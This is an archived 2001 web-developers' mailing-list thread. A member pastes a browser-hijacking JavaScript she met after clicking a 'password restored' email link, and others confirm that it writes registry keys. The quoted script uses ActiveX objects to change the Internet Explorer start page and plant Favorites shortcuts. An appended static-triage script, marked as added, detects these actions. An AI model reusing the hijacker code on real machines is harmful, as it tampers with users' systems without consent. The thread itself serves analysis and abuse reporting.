Re: Not so nice JS intruding on a computer without one's knowledge

by "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>

 Date:  Sat, 11 Aug 2001 10:41:23 -0400
 To:  "Webmaster(at)kapnkreations.com" <webmaster(at)kapnkreations.com>, "Hwg-Techniques (E-mail)" <hwg-techniques(at)hwg.org>
 References:  kapnkreations
Yes, I agree, I see the registry keys there.  The script didn't do as it was
designed.  I have no favorites marked that way and it wasn't able to change
my home page as I figure the script is attempting.  However, I tracked down
the site owner, the ISP this is located on, the ISP from the email, and all
that.   I have never really actively pursued a spammer, but would like to
really go after this one.

Anyone know how to do that?   This is a nasty thing, and I think the ISP
where the site is housed should know.  I am writing letters as we speak.

Nancy


Ouch!  Those look frightfully like registry settings......(I am a Mac
Developer so I apologize if my syntax is incorrect)!  I tend to delete
immediately anything that arrives from suspicious sources - not even
previewing in the preview pane.

I would run some serious diagnostics on your machine....anti-virus, some
disk utilities, etc.


--
Blane Warrene
Chief Technology Officer
Kap`n Kreations | Internet Solutions
cto(at)kapnkreations.com
http://www.kapnkreations.com

> From: "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>
> Date: Fri, 10 Aug 2001 16:57:27 -0400
> To: "Hwg-Techniques (E-mail)" <hwg-techniques(at)hwg.org>
> Subject: Not so nice JS intruding on a computer without one's knowledge
>
> Hello,
>
> I am curious.  I got an email, and it had a simple message:  Your password
> has been changed.  To restore your password click here.  Well I knew it was
> a trap of sorts, but to stay on top of things I went there anyway.
>
> When I got there it was a blank page, that said your password has been
> restored.  Nothing else.  Website I have never seen before.  In viewing the
> html, the page calls up a javascript.
>
> I captured the script below:  Would someone please tell me what all this
> thing has done?  Obviously it is attempting to make changes to my registry,
> favorites folder, but what else is it doing?
> Thanks in Advance
> Nancy
> (I changed the two urls that it included to generics to use as examples.  I
> had just had a friend experience this and it is very angering for me.)
>
> _________________________________________
>
> document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
>
>
>
> function AddFavLnk(loc, DispName, SiteURL)
> {
> var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
> Shor.TargetPath = SiteURL;
> Shor.Save();
> }
>
> function f(){
> try
> {
> a1=document.applets[0];
> a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> a1.createInstance();
> Shl = a1.GetObject();
> a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
> a1.createInstance();
> FSO = a1.GetObject();
> a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
> a1.createInstance();
> Net = a1.GetObject();
>
> try{
>
> var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
> document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
>
>
>
> ////////////////////////////////////////////////////////////////////////////
> /// home page
>
>
> Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://badwebsitename here/");
> var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
> document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
> var WF, Shor, loc;
> WF = FSO.GetSpecialFolder(0);
> loc = WF + "\\Favorites";
>
> if(!FSO.FolderExists(loc))
> {
> loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
> if(!FSO.FolderExists(loc))
> {
> return;
> }
> }
>
>
> ////////////////////////////////////////////////////////////////////////////
> /// Favorites
>
>
> AddFavLnk(loc, " Britney Spears Nude", "http://www.whatever.com");
> AddFavLnk(loc, " Aol", "http://www.aol.com");
> }
> catch(e){ }
> }
> catch(e){ }
> }
> function init(){
> setTimeout("f()", 1000);
> }
> init();
> _______________________________________________
>
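
Added example, not part of the original thread and not written by any poster: a static triage in JavaScript that addresses the question in the quoted message by listing, without running the script, which COM objects it instantiates, which registry values it writes and which Favorites entries it creates. The CLSID-to-object names, the function name `triageScript` and the placeholder URL in the constructed sample are assumptions of this example.

```javascript
// Added example: static triage of a captured script. The input is only
// pattern-matched as text and is never executed.
// CLSID -> object names are supplied by this example (not stated in the thread).
const KNOWN_CLSIDS = {
  "F935DC22-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Shell (registry writes, shortcuts)",
  "0D43FE01-F093-11CF-8940-00A0C9054228": "Scripting.FileSystemObject (file system access)",
  "F935DC26-1CF0-11D0-ADB9-00C04FD58A0B": "WScript.Network (user name lookup)",
};

function triageScript(source) {
  const report = { applet: false, comObjects: [], registryWrites: [], favorites: [] };
  // The zero-size applet is the bridge from page script to ActiveX objects.
  report.applet = /com\.ms\.activeX\.ActiveXComponent/i.test(source);
  for (const m of source.matchAll(/setCLSID\(\s*"\{([0-9A-Fa-f-]{36})\}"\s*\)/g)) {
    const clsid = m[1].toUpperCase();
    report.comObjects.push({ clsid, name: KNOWN_CLSIDS[clsid] || "unknown" });
  }
  // RegWrite("key", "value"): undo the doubled backslashes of the JS literal.
  for (const m of source.matchAll(/RegWrite\s*\(\s*"([^"]+)"\s*,\s*"([^"]*)"/g)) {
    report.registryWrites.push({ key: m[1].replace(/\\\\/g, "\\"), value: m[2] });
  }
  // AddFavLnk(loc, "name", "url") is the helper name used in the captured script;
  // requiring quoted arguments skips the function definition itself.
  const fav = /AddFavLnk\s*\(\s*\w+\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)/g;
  for (const m of source.matchAll(fav)) {
    report.favorites.push({ name: m[1].trim(), url: m[2] });
  }
  return report;
}

// Constructed sample: a shortened excerpt modelled on the quoted script,
// with a placeholder URL in place of the site name.
const SAMPLE = String.raw`
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>")
function AddFavLnk(loc, DispName, SiteURL) { }
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://placeholder.example/");
AddFavLnk(loc, " Aol", "http://www.aol.com");
`;

console.log(JSON.stringify(triageScript(SAMPLE), null, 2));
```

The registry key and Favorites entries in the report are the places to inspect and restore on a machine that loaded such a page.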

HWG hwg-techniques mailing list archives, maintained by Webmasters @ IWA